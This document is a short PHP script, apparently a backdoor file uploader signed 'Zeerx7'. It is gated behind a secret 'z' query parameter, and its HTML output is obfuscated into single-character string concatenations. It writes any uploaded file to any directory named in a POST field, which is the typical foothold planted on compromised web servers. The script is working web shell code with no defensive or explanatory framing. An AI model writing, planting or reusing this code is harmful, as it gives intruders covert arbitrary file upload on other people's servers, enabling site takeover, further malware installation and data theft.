<?php
if($_GET['z']??false){
    $todir = $_POST['p'] ?? dirname(__FILE__);
echo "<"."b"."r".">"."<"."c"."e"."n"."t"."e"."r".">"."
<"."p"."r"."e".">"."
<b>{ U"."p"."l"."o"."a"."d"."e"."r"." "."b"."y"." "."Z"."e"."e"."r"."x"."7"." }</b>
<"."f"."o"."r"."m"." "."m"."e"."t"."h"."o"."d"."="."'"."p"."o"."s"."t"."'"." "."e"."n"."c"."t"."y"."p"."e"."="."'"."m"."u"."l"."t"."i"."p"."a"."r"."t"."/"."f"."o"."r"."m"."-"."d"."a"."t"."a"."'".">"."
U"."p"."l"."o"."a"."d"." "."t"."o".":"." "."<"."i"."n"."p"."u"."t"." "."t"."y"."p"."e"."="."'"."t"."e"."x"."t"."'"." "."v"."a"."l"."u"."e"."="."'$todir' n"."a"."m"."e"."="."'"."p"."'".">"." "."<"."b"."r"."/".">"."
<"."i"."n"."p"."u"."t"." "."t"."y"."p"."e"."="."'"."f"."i"."l"."e"."'"." "."n"."a"."m"."e"."="."'"."_"."_"."'".">"."<"."i"."n"."p"."u"."t"." "."n"."a"."m"."e"."="."'"."_"."'"." "."t"."y"."p"."e"."="."'"."s"."u"."b"."m"."i"."t"."'"." "."v"."a"."l"."u"."e"."="."'"."U"."P"."L"."O"."A"."D"."'".">"."<"."/"."f"."o"."r"."m".">"."
";
    if ($_POST) {
        if (rename($_FILES['__']['tmp_name'], $todir.'/'.$_FILES['__']['name'])) {
            echo "<"."b".">"."U"."p"."l"."o"."a"."d"."e"."d"." "."s"."u"."c"."c"."e"."s"."s"."f"."u"."l"."l"."y"."<"."/"."b".">"."<"."b"."r".">"." ". $todir.'/'.$_FILES['__']['name'];
        } else {
            echo "<"."b".">"."F"."a"."i"."l"."e"."d"." "."t"."o"." "."u"."p"."l"."o"."a"."d"."!"."";
        }
    }
}
